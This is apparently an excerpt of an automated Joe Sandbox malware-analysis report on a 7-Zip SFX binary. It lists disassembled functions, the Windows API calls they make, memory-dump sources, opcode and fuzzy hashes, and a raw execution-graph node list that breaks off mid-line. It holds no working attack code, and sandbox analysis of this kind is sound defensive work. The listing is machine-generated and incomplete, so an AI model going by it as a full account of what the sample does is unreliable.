                                                            Uniqueness Score: -1.00%

                                                            Function 00423B26 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001), ref: 00423B3D
                                                            • GetLastError.KERNEL32(?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001,00000020,00000001,?,004222F6,00000008), ref: 00423B49
                                                              • Part of subcall function 00423B0F: CloseHandle.KERNEL32(FFFFFFFE,00423B59,?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001,00000020,00000001), ref: 00423B1F
                                                            • ___initconout.LIBCMT ref: 00423B59
                                                              • Part of subcall function 00423AD1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00423B00,00422CFF,00000001,?,00421D77,00000020,?,00000001,00000020), ref: 00423AE4
                                                            • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001,00000020), ref: 00423B6E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                            • String ID:
                                                            • API String ID: 2744216297-0
                                                            • Opcode ID: a944fb99e7b2b374bd4570eb33053cbf68d372fdd3fd1b807fb5878d0aba8dcf
                                                            • Instruction ID: 6e3417803b54ef101afe954cc20647d008ba39fcdc3d0f8361be9411dcc04981
                                                            • Opcode Fuzzy Hash: a944fb99e7b2b374bd4570eb33053cbf68d372fdd3fd1b807fb5878d0aba8dcf
                                                            • Instruction Fuzzy Hash: 30F03737240168BBCF221FD1EC0499A3F75FB09361F414061FD1885132C636A920DB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040407A Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00404081
                                                            • GetWindowRect.USER32(?,?), ref: 00404095
                                                            • ScreenToClient.USER32(00000000,?), ref: 0040409D
                                                            • ScreenToClient.USER32(00000000,?), ref: 004040A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ClientScreen$ParentRectWindow
                                                            • String ID:
                                                            • API String ID: 2099118873-0
                                                            • Opcode ID: 242cb847b908aef7fe0f63a76772a1eb7179347912ee3f5dfa59614ea61c8f81
                                                            • Instruction ID: 1bb9de8deef0c4eadeb51bb58cda059a22e74be80e731539d07777f5163e87d7
                                                            • Opcode Fuzzy Hash: 242cb847b908aef7fe0f63a76772a1eb7179347912ee3f5dfa59614ea61c8f81
                                                            • Instruction Fuzzy Hash: 84E04F72200249BFDB209FA2EC8CC6B7BADFF893553454035FE05D2121C731D8028BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041C950 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0041C959
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 0041C96C
                                                            • _free.LIBCMT ref: 0041C97D
                                                            • _free.LIBCMT ref: 0041C98E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: a63f5945b69e72ce60f23a0b7b4e1b51cb5caed925be45391033b220c94745b5
                                                            • Instruction ID: b3ff374741030e2cef21a52ca44da37e9b0fc9d48e3f3c4c1dc2118c6cae4885
                                                            • Opcode Fuzzy Hash: a63f5945b69e72ce60f23a0b7b4e1b51cb5caed925be45391033b220c94745b5
                                                            • Instruction Fuzzy Hash: 0DE0B6B1800220BA96167F26BC4148BBEE2FB58717305643BF86116635C77D07D2AF9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041FB1B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0041FB80
                                                            • _free.LIBCMT ref: 0041FBAC
                                                              • Part of subcall function 0041BA0A: IsProcessorFeaturePresent.KERNEL32(00000017,0041D506,?,0000000A,00000001,?,?,00404368), ref: 0041B9E2
                                                              • Part of subcall function 0041CF16: IsProcessorFeaturePresent.KERNEL32(00000017,0041CF05,00000001,0041A92A,0041B0BD,00000000,00000000,00000000,?,?,0041CF12,00000000,00000000,00000000,00000000,00000000), ref: 0041CF18
                                                              • Part of subcall function 0041CF16: GetCurrentProcess.KERNEL32(C0000417,0041A92A,00000001,00426DB8,?,0000000A,00000001,?,?,00404368), ref: 0041CF3B
                                                              • Part of subcall function 0041CF16: TerminateProcess.KERNEL32(00000000,?,0000000A,00000001,?,?,00404368), ref: 0041CF42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
                                                            • String ID: (3k
                                                            • API String ID: 1729132349-3876852650
                                                            • Opcode ID: 4f7c3d3ca1c805a6a33291a6ecc9934ee780860f4912c396687456ca3d590639
                                                            • Instruction ID: 4e0fb4f926529e79f4a7d6dde1df51a0bf0b4c0fa37cc1f96978be7dd00a29df
                                                            • Opcode Fuzzy Hash: 4f7c3d3ca1c805a6a33291a6ecc9934ee780860f4912c396687456ca3d590639
                                                            • Instruction Fuzzy Hash: CB2149B2A082029FDB149F64D851BE6B3A9EF50315F24007BF804C7285E779E987C65C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407F92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00407E7F: GetSystemMetrics.USER32(0000000B), ref: 00407EA9
                                                              • Part of subcall function 00407E7F: GetSystemMetrics.USER32(0000000C), ref: 00407EB0
                                                            • GetSystemMetrics.USER32(00000007), ref: 00407FA9
                                                            • GetSystemMetrics.USER32(00000007), ref: 00407FBA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem
                                                            • String ID: 100%%
                                                            • API String ID: 4116985748-568723177
                                                            • Opcode ID: 93db61c100534800ce29d993e9fe797df588032f6be8180189ff29f6aa40ef41
                                                            • Instruction ID: ce87771dc589547d15901bcf166d76b72ecb80b91b45d889f4387b3e1310f4ab
                                                            • Opcode Fuzzy Hash: 93db61c100534800ce29d993e9fe797df588032f6be8180189ff29f6aa40ef41
                                                            • Instruction Fuzzy Hash: EF318371A003059FCB20DF65DA429AABBF4EF50708F01052EE582B22D1DB74FD48CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004199ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `3C$l3C
                                                            • API String ID: 0-4265917238
                                                            • Opcode ID: d20e29b7d094c91299eec6aafbd5e6c7172bc504832a2672b6fcd718cb3214f2
                                                            • Instruction ID: 6356b1a915ef8860ba695889b97caffd8aa89e3941321954ee050adec02bd90d
                                                            • Opcode Fuzzy Hash: d20e29b7d094c91299eec6aafbd5e6c7172bc504832a2672b6fcd718cb3214f2
                                                            • Instruction Fuzzy Hash: 30110E32D006946ADF11EF7C98513DF77A45F06365F14806BEC10EB281DBB89E858B9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409614 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Itemwsprintf
                                                            • String ID: (%d%s)
                                                            • API String ID: 449186261-2087557067
                                                            • Opcode ID: 191b2b2badaf5088db7bd9791588117387bc847f1eeb21283be27793c54b44f5
                                                            • Instruction ID: 961ef12b7f81373e4d7e448de88036decbecb2740a9fdb84b0f6dffdc42473d0
                                                            • Opcode Fuzzy Hash: 191b2b2badaf5088db7bd9791588117387bc847f1eeb21283be27793c54b44f5
                                                            • Instruction Fuzzy Hash: BCF06D71900219BFCF10BBA5DC46ECE77BC9F04308F50446EF611A11A2DB75AA58CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00407C4C: KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407C87
                                                              • Part of subcall function 00407C4C: GetSystemMetrics.USER32(00000011), ref: 00407C99
                                                            • IsWindow.USER32 ref: 00409E4D
                                                            • IsBadReadPtr.KERNEL32(00000078), ref: 00409E5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherMetricsReadSystemUserWindow
                                                            • String ID: L~B
                                                            • API String ID: 388239213-2947537266
                                                            • Opcode ID: 27696cd1a3baece273c014428d0ea7c9a6b16cad877120aed2b7f3b1661639b5
                                                            • Instruction ID: ce81054f34517ac8cb1c1b6af2c4e9e9ba25342e94a81ed38c10c3427d1e6252
                                                            • Opcode Fuzzy Hash: 27696cd1a3baece273c014428d0ea7c9a6b16cad877120aed2b7f3b1661639b5
                                                            • Instruction Fuzzy Hash: C5F0CD30A44245AAEB24EBF1DD56B997B70BB1070DF00503AE601652F6DBB95848CB6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409CC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00408522: IsWindow.USER32(00000000), ref: 0040852B
                                                            • CreateThread.KERNEL32(00000000,00000000,00409F06,\}B,00000000,00000000), ref: 00409CD8
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00409D01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CreateItemThreadWindow
                                                            • String ID: \}B
                                                            • API String ID: 1005160481-2560895425
                                                            • Opcode ID: 6d645a3ad78bdec778684f09af2879a306885051c8aa3b18d38ab2f617f61e2a
                                                            • Instruction ID: 938b772c0cf9f24596c8b3d0d952870e7f8d12035a54c5ee2c90f44a47b3bbf4
                                                            • Opcode Fuzzy Hash: 6d645a3ad78bdec778684f09af2879a306885051c8aa3b18d38ab2f617f61e2a
                                                            • Instruction Fuzzy Hash: 3FE0D8B12402207BE92037267D1BEBB3A4DDB44760700013FB906E11D3CFB84C41956C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040847E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DialogWindow
                                                            • String ID: ExecuteOnLoad
                                                            • API String ID: 2634769047-2703198497
                                                            • Opcode ID: ef7443b5fa8d86cee527d923d5d084d8659be588db9ef38a580634f9b905b377
                                                            • Instruction ID: ee3438a96e93673946ee09edf32420b0340fb94c0ae55f0afe696ebeb359c8d8
                                                            • Opcode Fuzzy Hash: ef7443b5fa8d86cee527d923d5d084d8659be588db9ef38a580634f9b905b377
                                                            • Instruction Fuzzy Hash: 45C08030300210DFD7305B20FD097427E94EF00700F01807DB445D11B0DB719C019A54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004066B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 004066C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: 7-Zip SFX$Could not allocate memory
                                                            • API String ID: 2030045667-3806377612
                                                            • Opcode ID: 47e90567e423e06cff3ef49a42f6aa0890174b6994cf300e2ecb470e6fd6ac96
                                                            • Instruction ID: 01943cf8c3f835da64c8d14df7b5580dbb2e751ba1447031187b58d6241af338
                                                            • Opcode Fuzzy Hash: 47e90567e423e06cff3ef49a42f6aa0890174b6994cf300e2ecb470e6fd6ac96
                                                            • Instruction Fuzzy Hash: 40B012303D931021E11093302C0BF1E1440170CF12FD104917201A80C1C6D41150100C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:3.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:1.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:47
                                                            execution_graph 104759 928752 104764 92850e 104759->104764 104762 92877a 104769 92853f try_get_first_available_module 104764->104769 104766 92873e 104783 922aac 26 API calls ___std_exception_copy 104766->104783 104768 928693 104768->104762 104776 930cd7 104768->104776 104769->104769 104772 928688 104769->104772 104779 91915b 40 API calls 2 library calls 104769->104779 104771 9286dc 104771->104772 104780 91915b 40 API calls 2 library calls 104771->104780 104772->104768 104782 922b68 20 API calls __dosmaperr 104772->104782 104774 9286fb 104774->104772 104781 91915b 40 API calls 2 library calls 104774->104781 104784 9303d4 104776->104784 104778 930cf2 104778->104762 104779->104771 104780->104774 104781->104772 104782->104766 104783->104768 104785 9303e0 BuildCatchObjectHelperInternal 104784->104785 104786 9303ee 104785->104786 104789 930427 104785->104789 104841 922b68 20 API calls __dosmaperr 104786->104841 104788 9303f3 104842 922aac 26 API calls ___std_exception_copy 104788->104842 104795 9309ae 104789->104795 104794 9303fd __wsopen_s 104794->104778 104796 9309cb 104795->104796 104797 9309e0 104796->104797 104798 9309f9 104796->104798 104858 922b55 20 API calls __dosmaperr 104797->104858 104844 925571 104798->104844 104801 9309fe 104802 930a07 104801->104802 104803 930a1e 104801->104803 104860 922b55 20 API calls __dosmaperr 104802->104860 104857 9306ed CreateFileW 104803->104857 104807 930a0c 104861 922b68 20 API calls __dosmaperr 104807->104861 104808 930ad4 GetFileType 104812 930b26 104808->104812 104813 930adf GetLastError 104808->104813 104810 930a57 104810->104808 104811 930aa9 GetLastError 104810->104811 104862 9306ed CreateFileW 104810->104862 104863 922b32 20 API calls 2 library calls 104811->104863 104866 9254ba 21 API calls 3 library calls 104812->104866 104864 922b32 20 API calls 2 library calls 104813->104864 104814 9309e5 104859 922b68 20 API calls __dosmaperr 104814->104859 104818 930aed CloseHandle 104818->104814 104821 930b16 104818->104821 104820 930a9c 104820->104808 104820->104811 104865 922b68 20 API calls __dosmaperr 104821->104865 104822 930b47 104824 930b93 104822->104824 104867 9308fe 72 API calls 4 library calls 104822->104867 104829 930bc0 104824->104829 104868 9304a0 72 API calls 4 library calls 104824->104868 104825 930b1b 104825->104814 104828 930bb9 104828->104829 104830 930bd1 104828->104830 104869 9289fe 104829->104869 104832 93044b 104830->104832 104833 930c4f CloseHandle 104830->104833 104843 930474 LeaveCriticalSection __wsopen_s 104832->104843 104884 9306ed CreateFileW 104833->104884 104835 930c7a 104836 930cb0 104835->104836 104837 930c84 GetLastError 104835->104837 104836->104832 104885 922b32 20 API calls 2 library calls 104837->104885 104839 930c90 104886 925683 21 API calls 3 library calls 104839->104886 104841->104788 104842->104794 104843->104794 104845 92557d BuildCatchObjectHelperInternal 104844->104845 104887 9232ae EnterCriticalSection 104845->104887 104847 9255a9 104891 925350 21 API calls 3 library calls 104847->104891 104848 925584 104848->104847 104853 925617 EnterCriticalSection 104848->104853 104855 9255cb 104848->104855 104851 9255f4 __wsopen_s 104851->104801 104852 9255ae 104852->104855 104892 925497 EnterCriticalSection 104852->104892 104854 925624 LeaveCriticalSection 104853->104854 104853->104855 104854->104848 104888 92567a 104855->104888 104857->104810 104858->104814 104859->104832 104860->104807 104861->104814 104862->104820 104863->104814 104864->104818 104865->104825 104866->104822 104867->104824 104868->104828 104894 925714 104869->104894 104871 928a14 104907 925683 21 API calls 3 library calls 104871->104907 104872 928a0e 104872->104871 104873 928a46 104872->104873 104875 925714 __wsopen_s 26 API calls 104872->104875 104873->104871 104876 925714 __wsopen_s 26 API calls 104873->104876 104879 928a3d 104875->104879 104880 928a52 FindCloseChangeNotification 104876->104880 104877 928a6c 104878 928a8e 104877->104878 104908 922b32 20 API calls 2 library calls 104877->104908 104878->104832 104882 925714 __wsopen_s 26 API calls 104879->104882 104880->104871 104883 928a5e GetLastError 104880->104883 104882->104873 104883->104871 104884->104835 104885->104839 104886->104836 104887->104848 104893 9232f6 LeaveCriticalSection 104888->104893 104890 925681 104890->104851 104891->104852 104892->104855 104893->104890 104895 925721 104894->104895 104896 925736 104894->104896 104909 922b55 20 API calls __dosmaperr 104895->104909 104901 92575b 104896->104901 104911 922b55 20 API calls __dosmaperr 104896->104911 104899 925726 104910 922b68 20 API calls __dosmaperr 104899->104910 104901->104872 104902 925766 104912 922b68 20 API calls __dosmaperr 104902->104912 104903 92572e 104903->104872 104905 92576e 104913 922aac 26 API calls ___std_exception_copy 104905->104913 104907->104877 104908->104878 104909->104899 104910->104903 104911->104902 104912->104905 104913->104903 104914 932752 104917 8f433c 104914->104917 104918 8f437b mciSendStringW 104917->104918 104919 933d7f DestroyWindow 104917->104919 104920 8f4397 104918->104920 104921 8f45f2 104918->104921 104930 933d8b 104919->104930 104922 8f43a5 104920->104922 104920->104930 104921->104920 104923 8f4601 UnregisterHotKey 104921->104923 104951 8f42ae 104922->104951 104923->104921 104925 933da9 FindClose 104925->104930 104927 933dd0 104931 933df4 104927->104931 104932 933de3 FreeLibrary 104927->104932 104929 8f43ba 104929->104931 104939 8f43c8 104929->104939 104930->104925 104930->104927 104957 8f6903 104930->104957 104933 933e08 VirtualFree 104931->104933 104940 8f4435 104931->104940 104932->104927 104933->104931 104934 8f4424 OleUninitialize 104934->104940 104935 933e50 104944 933e5f messages 104935->104944 104961 963a5a 6 API calls messages 104935->104961 104936 8f4440 104937 8f4450 104936->104937 104955 8f4158 10 API calls 104937->104955 104939->104934 104940->104935 104940->104936 104942 8f4466 104956 8f4873 8 API calls 104942->104956 104948 933eee 104944->104948 104962 956bcd 8 API calls messages 104944->104962 104952 8f42bb 104951->104952 104953 8f42e0 104952->104953 104963 957723 8 API calls 104952->104963 104953->104927 104953->104929 104955->104942 104958 8f690d 104957->104958 104959 8f691c 104957->104959 104958->104930 104959->104958 104960 8f6921 FindCloseChangeNotification 104959->104960 104960->104958 104961->104935 104962->104944 104963->104952 104964 942f96 104980 8fdd50 messages 104964->104980 104965 8fe0b1 PeekMessageW 104965->104980 104966 8fdda7 GetInputState 104966->104965 104966->104980 104967 942254 TranslateAcceleratorW 104967->104980 104969 8fe12f PeekMessageW 104969->104980 104970 8fe113 TranslateMessage DispatchMessageW 104970->104969 104971 8fdfa4 timeGetTime 104971->104980 104972 8fe14f Sleep 104972->104980 104973 94310a Sleep 104986 942fe7 104973->104986 104976 942370 timeGetTime 105176 90a921 9 API calls 104976->105176 104979 9431a1 GetExitCodeProcess 104981 9431b7 WaitForSingleObject 104979->104981 104982 9431cd CloseHandle 104979->104982 104980->104965 104980->104966 104980->104967 104980->104969 104980->104970 104980->104971 104980->104972 104980->104973 104980->104976 104984 8fdf75 104980->104984 104980->104986 104996 8fe2f0 104980->104996 105003 8fe570 104980->105003 105026 9019c0 104980->105026 105094 8fc210 104980->105094 105160 90f3b7 104980->105160 105165 95efbc 104980->105165 105175 90ef0e timeGetTime 104980->105175 105177 964199 8 API calls 104980->105177 105178 8ff1e0 104980->105178 105203 963d0b 81 API calls __wsopen_s 104980->105203 105204 975ddf 8 API calls 104980->105204 104981->104980 104981->104982 104982->104986 104983 98317d GetForegroundWindow 104983->104986 104986->104979 104986->104980 104986->104983 104986->104984 104987 94323f Sleep 104986->104987 105205 90ef0e timeGetTime 104986->105205 105206 95dac1 CreateToolhelp32Snapshot Process32FirstW 104986->105206 104987->104980 104997 8fe30f 104996->104997 104998 8fe323 104996->104998 105216 8fd7f0 104997->105216 105248 963d0b 81 API calls __wsopen_s 104998->105248 105001 8fe31a 105001->104980 105002 94350b 105002->105002 105004 8fe5b0 105003->105004 105011 8fe67c messages 105004->105011 105289 910592 5 API calls __Init_thread_wait 105004->105289 105007 943560 105007->105011 105290 8fae03 105007->105290 105008 8fae03 8 API calls 105008->105011 105010 963d0b 81 API calls 105010->105011 105011->105008 105011->105010 105020 900b40 8 API calls 105011->105020 105021 8ff1e0 229 API calls 105011->105021 105023 8fe981 105011->105023 105280 8facbd 105011->105280 105284 8fad69 105011->105284 105288 90b215 229 API calls 105011->105288 105297 910592 5 API calls __Init_thread_wait 105011->105297 105298 9103f3 29 API calls __onexit 105011->105298 105299 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105011->105299 105300 974f5b 229 API calls 105011->105300 105301 977048 229 API calls 105011->105301 105016 943584 105296 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105016->105296 105020->105011 105021->105011 105023->104980 105027 901e60 105026->105027 105028 901a26 105026->105028 105600 910592 5 API calls __Init_thread_wait 105027->105600 105030 901a40 105028->105030 105031 946b5f 105028->105031 105335 901fd0 105030->105335 105032 946b6b 105031->105032 105610 977823 229 API calls 105031->105610 105032->104980 105034 901e6a 105036 901eab 105034->105036 105601 8fa1d4 105034->105601 105041 946b74 105036->105041 105043 901edc 105036->105043 105039 901fd0 9 API calls 105040 901a66 105039->105040 105040->105036 105042 901a9c 105040->105042 105071 946b97 105041->105071 105611 963d0b 81 API calls __wsopen_s 105041->105611 105042->105041 105066 901ab8 __fread_nolock 105042->105066 105044 8fa35b 8 API calls 105043->105044 105046 901ee9 105044->105046 105608 90e5a1 229 API calls 105046->105608 105047 901e84 105607 910548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105047->105607 105050 946b9c 105612 963d0b 81 API calls __wsopen_s 105050->105612 105051 901bdf 105053 946bff 105051->105053 105054 901bec 105051->105054 105614 975ecc 53 API calls _wcslen 105053->105614 105056 901fd0 9 API calls 105054->105056 105058 901bf9 105056->105058 105057 